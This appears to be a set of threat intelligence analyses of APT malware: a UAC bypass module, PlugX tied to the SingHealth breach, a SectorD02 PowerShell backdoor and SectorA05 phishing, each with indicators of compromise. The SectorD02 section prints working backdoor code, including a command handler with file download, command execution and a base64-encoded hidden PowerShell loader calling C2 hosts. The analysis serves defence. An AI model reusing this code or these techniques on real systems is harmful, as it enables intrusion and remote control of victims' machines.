Threat Actor Group using UAC Bypass Module to run BAT File

Overview

Our Threat Recon team continues to collect and analyze activity-related data from multiple APT groups. We analyzed malware used in hacking activities targeting organizations located in South Korea, the US, and East Asia earlier this year. They use a CAB file that compresses the malware, separate configuration files and a specific User Access Control (UAC) bypass module. This article briefly describes the infection method of the malware that they were using at the time and the UAC bypass module used.

Infection Method

The attackers used quite a few steps to generate their malware, and the initial infection comes from malicious documents attached to spear phishing emails. When a user executes a file attached to the email, a batch file for downloading a base64-encoded CAB file from a remote site is downloaded through a script included in the document.

Infection method using CAB file

The following is the sequence of the infection method that they use.

  1. Download base64 encoded data 1.txt via script embedded in malicious documents
  2. Decode “1.txt” to create “1.bat” and run “1.bat”
  3. “1.bat” downloads 2.txt (32-bit) or 3.txt (64-bit) according to the Windows platform environment (32bit / 64bit)
  4. Decode “2.txt” or “3.txt” to create “setup.cab”

Each file looks like an SSL certificate using the string “—– BEGIN CERTIFICATE —–“, but this is actually a base64 encoded cab and bat file.

Left: The 1.bat file used to decompress the CAB file and run the main payload
Right: The 2.txt CAB file for 32-bit Windows systems

The CAB file is created according to the Windows platform environment through the following files:

  1. BAT file for main payload file execution
  2. INI file containing attacker server address
  3. DLL file for UAC bypass
  4. Main EXE payload

Why does UAC Run?

This malware’s first batch file (1.bat) executes a second batch file which installs the main payload. A UAC pop-up will normally be shown to the user and this is caused by the code in the BAT file that installs the main payload. It copies the INI configuration file and the main payload EXE into the System32 folder.

In general, when files are copied to the System32 folder, a UAC pop-up will run for security reasons. This folder should not be modified in normal situations because it contains important files used to operate the system.

Why UAC runs

BAT File Details

The first batch file (1.bat) downloads the file from a remote server and uses the “net session> nul” command to verify the current user rights and perform the following actions:

  • If admin : Delete UAC bypass DLL, execute main payload and BAT file
  • If not admin : Execute the following command using rundll32.exe
    Command : “[UAC Bypass Module], EntryPoint [Main Payload execution BAT file]”.
Batch Code

The batch file used to install the main payload copies the main payload executable and INI configuration files into the System32 folder, and then runs the main payload which was moved to the System32 folder.

BAT file running Main Payload Code

About UAC

User Account Control (UAC) is a Windows operating system security control function based on the concept of access tokens. It displays a screen informing the user when a program requires administrator level privileges, acting as a warning prompt for user consent of unknown privileged activity.

UAC popped up on screen

How it works

When a user logs into Windows, each user is given an access token. This access token has information on the security identifier (SID), the Windows operating system privilege, and the access level granted to the user, and the Windows system uses the access token to verify the user’s privilege. The access tokens generated at login are:

  • standard user : Generates a standard user access token
  • administrator : Generate standard user access token, administrator access token

The system allocates the following integrity levels according to the token privileges of the logged-in user. System performs access control by comparing the access rights of the security descriptor of the object with the user’s SID.

Processes that run at Medium Level

Issued tokens are used for events such as process creation. The important thing here is that when a process is created after issuing a token, the administrator also executes the new process using the standard user access token.

Generally, explorer.exe which is the parent process of most user processes operates at medium integrity level, so most processes run at the same level to explorer.exe. But when a process requires a high integrity level, processes can obtain an elevated privilege if the user approves it.

This basically means that a process typically uses a standard user access token and uses the UAC to get the user’s authorization if an administrator access token is needed.

The following such actions are examples of events which trigger UAC:

Running an Application as an Administrator
Changes to system-wide settings
Changes to files in folders that standard users don’t have permissions for (such as %SystemRoot% or %ProgramFiles% in most cases)
Changes to an access control list (ACL), commonly referred to as file or folder permissions
Installing device drivers
Installing ActiveX controls
Changing settings for Windows Firewall
Changing UAC settings
Configuring Windows Update
Adding or removing user accounts
Changing a user’s account type
Turning on Guest account (Windows 7 and 8.1)
Turning on file sharing or media streaming
Configuring Parental Controls

UAC Bypass Module

However, the attackers in this case use a particular DLL module for bypassing UAC. It seems to have been created by referring to the source code of a file named UAC-TokenMagic.ps1 which is open source on GitHub.

First, it creates a wusa.exe process (an auto-elevatable process) that runs at a High Integrity Level. This process is the Windows Update Standalone installer, and it has an auto-elevate attribute so it does not pop up UAC if the system UAC popup setting is “Notify me only when programs / apps try to make changes to my computer”.

After creating wusa.exe, it copies that token and run the cmd.exe process via CreateProcessWithLogonW using the copied token. Finally, cmd.exe runs at a High Integrity Level and executes “/c EntryPoint” %Temp%\[bat file install main payload]” and this batch file inherits the elevated privilege of cmd.exe.

Part of the UAC Bypass module code

If the attacker is using the UAC bypass module, the batch file that runs the main payload will work through the cmd.exe generated by copying the access token from wusa.exe. In conclusion, the UAC will not pop up even if the code that moves the file into the System32 folder in batch file is executed.

Summary

The attackers compress the UAC Bypass Module with other components and distributes them in a CAB file format. We have seen this threat actor group mainly use decoy documents written in Russian, English and Korean and used the BABYFACE, SYSCON malware variants as the main payload. Such activity may be related in part to the activities of the previously known threat actor groups. Our Threat Recon team will continue to monitor these Cyber Threat.

Indicators of Compromise

Hashes(SHA-256)

2b94c694a6279eaa08ce4a17fb848c8431c14beb9f811f1b2732b778c1703fbf
1df5cd85693dc2ce2ba5f7f251785b00b542d93f8e067539cadb550aa673759d
afdf1960a5c372b815475807ff1ad1d16874d2802ce4ee71da484d61220f7a65
4b825d310a305728b7a57d9eb6731db87e8da9cef4bc7917fca7f4503bcb3272
dd9bb177732197539bdb9167fb3dd784df10d6746a9b77255d62dfaccb092640
036567c36aaaabefcd222456b536bffee1ce4ccf279593048d62c9ef42b57472
4b825d310a305728b7a57d9eb6731db87e8da9cef4bc7917fca7f4503bcb3272
5c9773c3b4cf58839a476d469c6a705d66df95a2a8cc6ad72a3d914beff2eff5

IP Addresses

103[.]249[.]31[.]159
88[.]99[.]13[.]69
154[.]16[.]201[.]104

References

PowerShell-Suite/UAC-TokenMagic.ps1
Reading Your Way Around UAC (Part 1)
User Account Control

SectorM04 Targeting Singapore – An Analysis

Overview

On or around June 27, 2018, personal particulars of almost 1.5 million people was exfiltrated from a SingHealth database in Singapore where information on patients was stored. Multiple pieces and types of malware was used in this attack which took place over almost a year [1].

Illustration using details from p.53 of the COI report

On 6th March, Symantec released a blog article [2] linking several pieces of malware and a threat group which we will be tracking as SectorM04 to Singapore’s SingHealth breach last year. One such artifact we found an exact match on was the DLL Shellcode Loader which was referred to as Trojan.Vcrodat that is one of the files dropped as something which has characteristics of the PlugX RAT. The PlugX RAT is a RAT which has been used by multiple threat groups, including one which was reported to have interests in the healthcare sector [3].

Decoy (e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0)

The dropper for that file was in the form of a decoy executable/document and named as “PositionRequirement-SeniorCivilEngineer.doc.exe”. Opening this results in the Word document below being opened, and everything will seem normal to the victim.

Decoy document that is opened after executing the malware

However, this is actually a trick because the malware uses a “.docx.exe” extension. The actual executable drops other files in the same folder – a legitimate signed executable, a malicious DLL file which abuses the DLL search order [4] from the executable, a compressed shellcode file, a simple batch script (a.bat) to clear its tracks, and a normal Word document. The executable then executes the normal Word document, the batch script, and drops the remaining three files and executes the legitimate signed executable.

a.bat – a simple batch script to hide the tracks of the original EXE
:Repeat del <filepath>\filename.docx.exe if exist <filepath>\filename.docx.exe goto Repeat

If this was the RAT used for the initial infection, then it seems to reinforce the theory that one likely initial infection vector was via spear phishing using a link or an archived file [1]. This is because using an exploit to automatically run this dropper would not make sense as the malware also automatically opens a benign Word document which would arouse suspicion if it opened by itself.

PlugX Trinity

Those remaining three files are actually the three files in what other researchers have dubbed the PlugX Trinity [5] – a legitimate signed executable, a loader DLL, and a shellcode file.

In this example, while the legitimate signed executable was a file named adobe.exe it was actually an application from ESET. However, the attacker uses DLL side loading, and this “adobe.exe” file tries to load MSVCR110.dll which is a legitimate system DLL. But because of the way the DLL search order works, the system tries to find MSVCR110.dll from the directory from which the application loaded first, thus loading the attacker’s version of MSVCR110.dll.

MSVCR110.dll is a tiny dll made up of exported functions which the real MSVCR110.dll should have. These external functions simply jump to the MSVCR90.dll when called, except for the “__crtGetShowWindowMode” function which calls the malicious function. The malicious function will proceed to read the MSVCR110.dat shellcode file into memory and decompress the buffer using RtlDecompressBuffer under the COMPRESSION_FORMAT_LZNT1 scheme, a method seen since early days of the PlugX RAT [6], and further unpack the shellcode. Throughout the unpacking process, it makes use of its Process Environment Block (PEB) to parse the PEB_LDR_DATA structure for getting addresses of functions and libraries it wants to use.

When starting, this malware uses the Global mutex named “eeclnt”. It will run another copy of itself with the arguments “258”, and this copy will run %windir%\system32\msiexec.exe as it disables WOW64 redirection.

The created msiexec.exe will be started with the flags 0x434 which among other things starts the process in a suspended mode and command line arguments “259”, then performs process injection so that the malware is running as msiexec.exe.

Persistence

In order to persist on a system, the malware makes use of %APPDATA%\Windows folder, setting the folder attributes to HIDDEN | SYSTEM and moving MSVCR110.dll, MSVCR110.dat, and eeclnt.exe (renamed from adobe.exe) there. It stores this new location of the shellcode file (MSVCR110.dat) in an environment variable “%UI00%” and the location of the DLL file (MSVCR110.dll) in an environment variable “%UI01%”.

There are two persistence mechanisms it makes use of:

  1. Service with service name and display name set to “WanServer”, which starts %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”. The service description used is “Network for this computer. If this service is stopped, these functions will be unavailable.”, which is a generic sounding but unique description for this malicious service.
  2. If the service failed to be created, most likely due to insufficient privileges, then the malware would make use of the standard run registry key located at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with key “eeclnt” and value %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”.
Command LineDescription
NULLRe-run with arguments “258” and continue
“258” / “260”Run %windir%\system32\msiexec.exe with arguments “259” or “261” respectively in suspended mode and inject itself into it
“259”Create persistence via service / run registry key and run itself as “eeclnt.exe” with arguments “260”
“261”Run normally, including C2 communications.

C2 Beacon

The malware beacons using a legitimate HTTPS POST on port 443 to “/login.asp?id=%d” where %d is the victim identifier using the user-agent “User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)” via WinINet.dll’s HttpSendRequestA. If the configuration uses a different port, then the request is done via HTTP.

Hooking

The malware manually sets inline hooks on SspiCli.dll’s AcquireCredentialsHandleA function if running on Windows 10. AcquireCredentialsHandleA is actually a function normally called from secur32.dll, which then forwards the API call to SspiCli.dll. Before performing the actual function, the inline hook will use the process token from explorer.exe and perform ImpersonateLoggedOnUser() with that token, which is a trick we are seeing for the first time and seems to be for UAC bypass.

The malware also manually sets inline hooks on WSs2_32.dll’s closesocket and shutdown functions. Before performing the closesocket function, the inline hook will perform “setsockopt(socket, SOL_SOCKET, SO_DONTLINGER, 0, 4)” and on shutdown, the inline hook will simply return from the function instead.

Information Collected

The malware mainly collects the following information from the system automatically:

  • Major, minor, and build OS versions
  • NetBIOS Name
  • MAC Address
  • Logged on user name

Other PlugX Capabilities

Similar to previous PlugX variants [7], this version zeroes out its entire PE header (without that false “XV” header), together with other certain other PE sections we presume the attacker did not want others to see.

Finally, besides this technical analysis, it is important to remember that PlugX in general has reverse shell capabilities and typically has additional modules which might be either decrypted or downloaded as shellcode [8].

Summary

While we cannot be sure of the SectorM04’s motives, healthcare data is information that has a lot of potential for intelligence gathering with the most obvious being used for blackmail. They have shown their willingness, ability, and patience to compromise their targets, of which Singapore appears to be one of the bigger ones. As is the case for many nation state threat actor groups, it is important to remember that cyber is only one part of an intelligence operation.

ATT&CK Matrix

RECON
WEAPONIZATION
DELIVERY
EXPLOIT
INSTALL
COMMAND
OBJECTIVE

Indicators of Compromise

PlugX Trinity Hashes (SHA-256)

PlugX RAT Full Dropper
e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0

PlugX Trinity – Legitimate signed executables
fafb6ffd3ffcf414b702354f62a5216351af4566ed61ece7784846a6938bb8d9
36d76999e9090c99fae2388cd3476134464807fc597f67c60eebc76e32339683

PlugX Trinity – Malicious DLLs which are used to abuse search order
CACEA09B3A5839B0A158F49B4EFEC2A698DB8688F57A92CBA61F287A1619833E
ED3CD71EACA603A00E4C0804DC34D84DC38C6C1E1C1F43AF0568FB162C44C995
3B86CF2DEB6524D556AB0109B39A31AEDE3D0ACE423C94FD72DEFD6AB592A3AB
D784A12FEC628860433C28CAA353BB52923F39D072437393629039FA4B2EC8AD
6e874ac92c7061300b402dc616a1095fa7d13c8a18c8a3ea5b30ffa832a7372c

PlugX Trinity – Shellcode files
2201C3AC955148A078D366DC1E9F552FCA4A872756D3B6DA93494CDE8D5DECD5
5664334F2DE563B9F8978B7E33AED4526F96D6D9751F1204D7FBBF659C4F0F7B

Other Hashes (SHA-256)

Another RAT Used
b2b2e900aa2e96ff44610032063012aa0435a47a5b416c384bd6e4e58a048ac9
c83651940e90fd315f29fa878e96b9e1f624c840c09c187b376cffdd4c7dcd79
6a633b83987dc01ec30d07b56e8a8b632dcb8ad40602e7036648cd70cdfb9fde
9c2a0f30d49b70a9e81461c91e26ede52b9b65da4d44b7f81299914497203f29
552cc8f42953ece5f69cd8c75dd9af3c059d10327ac6b75e4922f01572d4b7b7

Others
9d9a6337c486738edf4e5d1790c023ba172ce9b039df1b7b9720ed4c4c9ade90
93c9310f3984d96f53f226f5177918c4ca78b2070d5843f08d2cf351e8c239d5
dda22de8ad7d807cdac8c269b7e3b35a3021dcbff722b3d333f2a12d45d9908d
f562e9270098851dc716e3f17dbacc7f9e2f98f03ec5f1242b341baf1f7d544c
a196dfe4ef7d422aadf1709b12511ae82cb96aad030422b00a9c91fb60a12f17

Domains

api[.]edu-us[.]tk
api[.]officeonlinetool[.]com
news[.]singmicrosoft[.]ga
api[.]micsoftoffice[.]ga

IP Addresses

195[.]20[.]45[.]94
64[.]20[.]227[.]134
50[.]63[.]202[.]51
192[.]71[.]247[.]131
158[.]255[.]4[.]177

References

[1] https://www.mci.gov.sg/coireport
[2] https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore
[3] https://www.kaspersky.com/about/press-releases/2018_chinese-speaking-apt-actor-caught-spying-on-pharmaceutical-organizations
[4] https://docs.microsoft.com/en-us/windows/desktop/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications
[5] https://citizenlab.ca/2012/09/human-rights-groups-targeted-by-plugx-rat/
[6] https://sophosnews.files.wordpress.com/2013/07/sophosszappanosplugxrevisitedintroducingsmoaler-rev1.pdf
[7] https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
[8] https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii.html

SectorD02 PowerShell Backdoor Analysis

Overview

SectorD02 is a state sponsored threat actor group which mainly targets governments and organizations around the Middle East. In this case, the target of this malware was Turkey, although it has been reported that they also sometimes target countries outside of the Middle East. One characteristic of SectorD02 is their incrementally changing PowerShell backdoor.

We came across two of SectorD02’s such backdoors at the end of 2018, and we analyzed these variants then identified them as the group’s PowerShell malware. SectorD02 focuses on using PowerShell scripts to carry out their attacks and loading those scripts past layers of obfuscation through a variety of methods. One such method is via PS2EXE (PowerShell to EXE), and our analysis on public reporting has shown they have used this vector sometimes [1] since their attacks had first been grouped and given a name [2].

PowerShell Backdoor

Both versions of the PS2EXE backdoors we came across end up executing the exact same PowerShell script (which includes the same victim ID), and the main difference seems to be that they were compiled seconds apart and yet having different compiler linker versions.

Hash (SHA-256)Compile TimestampLinker Version
4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd039414.10.2018 09:20:038.0 (.NET 2)
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c14.10.2018 09:20:2010.0 (.NET 4)

This is a strange scenario and seems to indicate that the attacker had likely either introduced build automation into its malware creation process or had more than one employee/machine/environment for creating builds for distribution and did so almost at the same time. However, since SectorD02 is constantly changing their methods of producing malware and the scripts themselves, it does not make any economical sense to automate this in a build and we have not seen evidence of it elsewhere, so the latter is what we believe to be the most likely scenario.

After extracting the encoded PowerShell script from the PS2EXE executable, the first thing we see is some Hebrew text stored in two variables. These same unused variables have been left there in other variants of their backdoor reported by others, but is completely meaningless as the attackers have even left Chinese text in earlier samples [3].

Some of the things we see in this version are:

  • Hiding and setting of system attribute for svchost.html, svchost.zip, and svchosts.exe in the C:\Windows directory. Similar sounding filenames/extensions have been reported being used by this group elsewhere [4], and indicate that there are other pieces of malware used in the same attack we are not yet aware of.
  • First persistence: Standard HKLM run registry key for “WindowsDefender” with the value “c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,”.
  • Second persistence: Scheduled task with the same value as before under “Microsoft\WindowsMapsUpdateInfo”.

Creating the Victim ID

As usual, they follow their mechanism for getting the victim ID using a combination of information taken from the victim machine. This similar kind of mechanism can be seen since early last year [5]. Recently, other researchers found a different version which used “::” as a separator instead of “**” [6], but it is hard to say whether these malware are made by the same group.

$SysInfo = getOS $SysInfo += “**” $SysInfo += getIP $SysInfo += “**” $SysInfo += getArch $SysInfo += “**” $SysInfo += getHostName $SysInfo += “**” $SysInfo += getDomain $SysInfo += “**” $SysInfo += isAdmin $SysInfo += getUsername $SysInfo += “**” $SysInfo += getPIP $global:id = md5generator($SysInfo) return ($global:id + ‘**’ + $SysInfo)

C2 Commands

When the group is not changing their malware functionality, they are constantly at least changing their naming of items in their scripts. In this variant, we can see the commands “upload”, “cmd”, “b64”, and “muddy”.

function command_and_control($cmd){ try{ if($cmd.StartsWith(‘upload’)){ try{ $cmd=$cmd.replace(‘upload ‘,”) $wc = New-Object System.Net.WebClient $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials $wc.DownloadFile($cmd, (“c:\programdata\” + $cmd.Substring($cmd.LastIndexOf(‘/’),$cmd.Length-$cmd.LastIndexOf(‘/’)))) return Eval “pwd” }catch{ return $_.Exception.Message } } elseif($cmd.StartsWith(‘cmd’)){ $cmd=$cmd.replace(‘cmd ‘,”) try{ $out = cmd /c $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘b64’)){ $cmd=$cmd.replace(‘b64 ‘,”) try{ $cmd = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($cmd)) $out = Eval $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘muddy’)){ $cmd=$cmd.replace(‘muddy ‘,”) $cmd = shttpGET($cmd) set-content -path “c:\programdata\LSASS” -value $cmd try{ Start-Process powershell -ArgumentList ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(“LWV4ZWMgQnlwYXNzIC1jICRzPShnZXQtY29udGVudCBjOlxwcm9ncmFtZGF0YVxMU0FTUyk7JGQgPSBAKCk7JHYgPSAwOyRjID0gMDt3aGlsZSgkYyAtbmUgJHMubGVuZ3RoKXskdj0oJHYqNTIpKyhbSW50MzJdW2NoYXJdJHNbJGNdLTQwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtpZXgoW1N0cmluZ106OkpvaW4oJycsJGQpKTs=”))) -WindowStyle Hidden return (Eval “ls c:\programdata”) } catch { return $_.Exception.Message } } else { return Eval $cmd } } catch{ return $_.Exception.Message } }

Random Proxy

This variant has four C2 IP addresses and uses one of them randomly. These IP addresses were used in other attacks around the same time as well [1]. As usual, these C2 servers are likely to be simply hacked servers like as before [7], something acknowledged by the attacker when they refer to their servers as proxies as well.

$C = @(‘hxxp://78[.]129[.]139[.]148′,’hxxp://79[.]106[.]224[.]203′,’hxxp://104[.]237[.]233[.]17′,’hxxp://185[.]34[.]16[.]82’) function getRandomProxy(){ $rnd = Get-Random -minimum 0 -maximum ($C.Length) $global:url = $C[$rnd] }

Interestingly, even at the time of writing, two of the proxy C2 servers (79[.]106[.]224[.]203 and 185[.]34[.]16[.]82) had the “MikroTik bandwidth-test server” on port 2000 enabled and that could have been how the servers got compromised and used as C2 servers.

Summary

SectorD02 is one of those groups which are much harder and complicated to attribute attacks to because attribution based solely/heavily on technical indicators from malware simply does not work. We have talked about this before in our previous post [8] and although this backdoor can be considered a custom malware, it may as well be open source because it is so easy for others to modify these malware and reuse it for their own attacks.

Indicators of Compromise

Hashes (SHA-256)

4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd0394
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c

IPs

78[.]129[.]139[.]148
79[.]106[.]224[.]203
104[.]237[.]233[.]17
185[.]34[.]16[.]82

References

[1] https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
[2] https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east
[3] https://securelist.com/muddywater/88059
[4] https://www.emanueledelucia.net/site/files/2018/10/muddywater.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html
[6] https://blog.trendmicro.com/trendlabs-security-intelligence/new-powershell-based-backdoor-found-in-turkey-strikingly-similar-to-muddywater-tools/
[7] https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/
[8] https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/

The Double Life of SectorA05 Nesting in Agora (Operation Kitty Phishing)

Overview

In early January 2019, an email containing malware was distributed to 77 reporters covering topics related to the Unification Ministry of South Korea. We analysed these malware and identified them as malware used by SectorA05, and we confirm that they have been using a specific C2 server with a Korean domain name using Japanese IP address for at least 27 months continuously.

In addition to these phishing attacks containing malware, phishing attacks were also used to steal email account information. These attacks mainly targeted South Korean government personnel such as employees from the central government, unification ministry, diplomacy, and defense. Recently, they have also expanded their targets to include cryptocurrency exchanges and individual users.

Their main purpose is to capture government confidential information and achieve monetary gain through stealing cryptocurrencies such as Ethereum and Bitcoin. We decided to group these wave of attacks under what we call “Operation Kitty Phishing”. Their attacks have been ongoing on a daily basis, and what we have discovered so far only appears to be the tip of the iceberg.

January 2019 Unification Reporters Attack

On January 7th, 2019, an email containing malware was distributed to 77 reporters who cover topics related to the Unification Ministry of South Korea using the email subject “RE: TF 참고자료”. A “TF 참고.zip” attachment had a password set and the password was sent along with the body of the email. The word “비번” in the body of the email is a slang word is used mainly by South Koreans, so these hackers are proficient in South Korean.

The zip attachment consists of two normal document files and a piece of executable malware disguised using a Hangul Word Processor (HWP) document icon with a lot of spaces in the filename so that the “.exe” extension is not visible to the user, thereby inducing file execution. When the malware is executed as an SFX (self-extracting archive) file type, it decompresses one normal Hangul Word Processor (HWP) document, “2.wsf” and “3.wsf”. What is unique about this is that it uses two different RATs. The first RAT is a DLL downloaded via “2.wsf” and the second RAT is the script-based “3.wsf” file. Even if one of them are detected, the other one gets used.

A. DLL-based RAT (downloaded by “2.wsf”)

The purpose of the “2.wsf” script is to download and run the BASE64 encoded “Freedom.dll” malware.

The malware spreads using a Google Drive URL in the “2.wsf” script. The URL of the C2 server is stored in Google Drive, and the C2 URL at the time of analysis was “hxxp://my-homework.890m[.]com/bbs/data/”.

“2.wsf” sends a progress log to the C2 server by the progress step so that the hacker can check the progress of each target user.

URLDescription
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=a Finished getting C2 URL
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=b The file name to be saved has been created
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=c The brave.ct file has been downloaded.
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=e Decoded and saved as Freedom.dll
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=f Executed the Freedom.dll file.

The file downloaded via “2.wsf” is “Freedom.dll”. This file uses Google Drive to get the address of the C2 server, but if it cannot connect to the C2 server or Google Drive, it uses “ago2[.]co[.]kr” as the C2 by default. This C2 server using a Korean Top Level Domain with a Japanese IP address is an important clue to track them.

This “Freedom.dll” file is designed to act as a downloader and has the following roles:

  • Check whether OS is 32-bit or 64-bit. If it is a 64bit OS, download and decrypt 64-bit malware (ahnlab.cab) then execute it.
  • It periodically sends infection information to the C2 server using the server relative path “/bbs/data/tmp/Ping.php?WORD=com_[MAC Address]&NOTE=[Windows Version]”
  • If the hacker uploads additional malware for a specific user, download “Cobra_[MAC Address]” file from C2 and decrypt the “Cobra_[MAC Address]” file then run Cobra.dll.
  • “/bbs/data/tmp/D.php?file=Cobra_[MAC Address]” is used to delete files from the C2 server.
  • DLL injection to explorer.exe

The “Freedom.dll” file uses a XOR Table to download and decrypt additional encrypted malware hosted on the C2 server. The XOR Table values used is ”
B20A82932F459278D44058ADBF3113FB56C1D749947D0FE00FE0ABC84BC8A02B” and this XOR Table has also been used in previous attacks of same hacker organization. More information about this XOR table is covered later in this post.

Depending on the target user, the hacker also selectively sends additional malware binaries under the file name “Cobra_[MAC Address]” which steals user information. This helps them ensure that their more valuable malware is kept only for victims they are interested in.

These additional malware binaries are covered later in this post.

B. Script-based RAT (“3.wsf”)

The “3.wsf” script is a script-based RAT. Unlike other malicious WSF (Windows Script File) scripts, it has its own RAT function and registers itself in the “RUN” registry with an “AhnLab V4” value to the persistent mechanism. AhnLab is a Korean local security vendor.

“3.wsf” downloads the C2 server’s URL from Google Drive.

URLDescription
hxxp://my-homework.890m[.]com/gnu/ver Version Check / Update
hxxp://my-homework.890m[.]com/gnu/board.php?m=MAC_ADDR&v=VERSION|TIMEOUT Get C2 command

The kinds of commands that the attacker makes through the C2 server are as follows.

[C2 command processing logic included in ‘3.wsf’ RAT]
C2 Control CodeDescription
cmd Execute command
download Download file from C2 server
upload Upload file to C2 server
update Update the “3.wsf” file
interval Change execution cycle (Default value 3 minutes)

A look at their past

We analyzed the above malware and identified them as SectorA05. Below is a look at their activities and attack methods based on the information from their malware.

Phishing Method of SectorA05 (Initial attack stage)

SectorA05 uses two methods of phishing for gaining initial access. First, phishing attacks to steal passwords of victim e-mail accounts and second, phishing attacks with malware attached to steal information of victim PCs.

A. Phishing attacks that steal passwords of email accounts

They create a phishing site similar to one that the target user uses and sends it to the target. They often mislead the victim using a security-related problem, such as a password reset request, to entice the target user to enter a password.

B. Malware attachment attacks

Malware is delivered via a variety of email attachments – script files, vulnerabilities in HWP documents, and renamed “EXE” executables looking like ordinary documents. These files are usually delivered as compressed files.

(1) Using script files

“WSF” and “VBS” script files are compressed into a single archive, which induces the user to execute the script file in the compressed file. The scripts used in the actual attack are as follows.

  • “정보보고.wsf” (Jan 2018)

    SHA256: 575606c03d3775cd8880c76a3ef7c014cfcab08411a01f07fc3fcb60166be50b

  • “공지사항.png.vbs” (July 2018)

    SHA256: c87f4aeebd3f518ba30780cb9b8b55416dcdc5a38c3080d71d193428b0c1cc5a

(2) Vulnerabilities in HWP documents

Using vulnerabilities in the HWP software which is widely used in Korea, malware can be executed when the target user views this document which was attached to the email. The HWP file used in the actual attack is as follows.

  • “종전선언.hwp” (May 2018)

    SHA256: 5f2ac8672e19310bd532c47d209272bd75075696dea6ffcc47d1d37f18aff141

(3) Executables looking like normal documents

The attacker inserts a lot of spaces in the filename to make the extension of the executable file such as “.exe” or “.scr” to be hidden from the user and misleads them into thinking the executable files are normal document files. The files used in the actual attack are as follows.

  • “미디어 권력이동⑥-넷플렉스, 유튜브.hwp [many space] .exe” ( Jan 2019)

    SHA256: c6c332ae1ccb580ac621d3cf667ce9c017be41f8ad04a94c0c0ea37c4789dd14

  • “중국-연구자료.hwp [many space] .scr” (Jan 2019)

    SHA256: 84edc9b828de54d4bd00959fabf583a1392cb4c3eab3498c52818c96dc554b90

Use of Google Drive

SectorA05 used Google Drive as a way to supply malware. Malware binaries, C2 domain information necessary for normal malware operations, and malware configuration files were all uploaded to Google Drive with accounts they created. These binaries will be downloaded through a script executed by the victim during the initial infection, with additional configuration or customized malware downloaded as well afterward. Using Google Drive also allowed them to bypass network security devices which would typically ignore Google services as a white-listed domain.

Here is a screenshot of Google Drive used by them.

The Google Drive URLs identified as used by the organization are:

  • hxxps://drive[.]google[.]com/uc?export=download&id=0B9_jdTGo3-sndXJESjllMkloOFU
  • hxxps://drive[.]google[.]com/uc?export=download&id=0B9_jdTGo3-snT3RTMHJMZEk2Szg
  • hxxps://drive[.]google[.]com/uc?export=download&id=1MVR58_5SlXgDZ5arasQk9AnmihAb3KJ6
  • hxxps://drive[.]google[.]com/uc?export=download&id=1ocUSxHf_0jUjVMMbAQzwTJb0blUG0bYh
  • hxxps://drive[.]google[.]com/uc?export=download&id=1olByidca-8vkS-5jRKL9CirKPEP7waHm
  • hxxps://drive[.]google[.]com/uc?export=download&id=1RC5_9WWrfMMZKfu11OfIac5y2d5vRH1c
  • hxxps://drive[.]google[.]com/uc?export=download&id=1xCePTgAdwNIAN7MWOH_80aN_TZgn8uFv

Gmail Phishing attacks

SectorA05 conducted phishing attacks for each target user’s email service. They used phishing attacks on users who were using Korea’s leading e-mail services and Google’s Gmail service. Through these phishing attacks, they wanted to get the password of the target user account. Here’s a look at some examples of Gmail phishing attacks.

The following screenshot shows phishing emails disguised as being sent from Gmail’s security team. It is actually sent to a specific target user by a hacker in SectorA05. It requests the target user to protect their email account because there was some unusual activity which does not seem to have been performed by the target user – if the link is clicked, the target user is directed to the phishing login site where the target user’s password will be transferred to the attacker’s server if they enter their password and “protect” their account.

[Examples of Gmail phishing mail]

SectorA05 has been using phishing attacks for many years. The phishing email information they used are as follows.

A. Phishing Mail Sender Email Address

They created email addresses that confused victims by using security-related keywords such as protect, privacy, and security.

  • acc[.]signnin[.]send@gmail[.]com
  • countine[.]protector[.]mail@gmail[.]com
  • n0[.]reaply[.]moster@gmail[.]com
  • no[.]raply[.]letservice@gmail[.]com
  • no[.]repiy[.]acc[.]notice@gmail[.]com
  • noreaply[.]securiity@gmail[.]com
  • noreply[.]centre[.]team@gmail[.]com
  • privacy[.]protect[.]team@gmail[.]com
  • protect[.]password[.]teams@gmail[.]com
  • protect[.]privacy[.]accounnt@gmail[.]com
  • protector[.]privacy[.]master@gmail[.]com

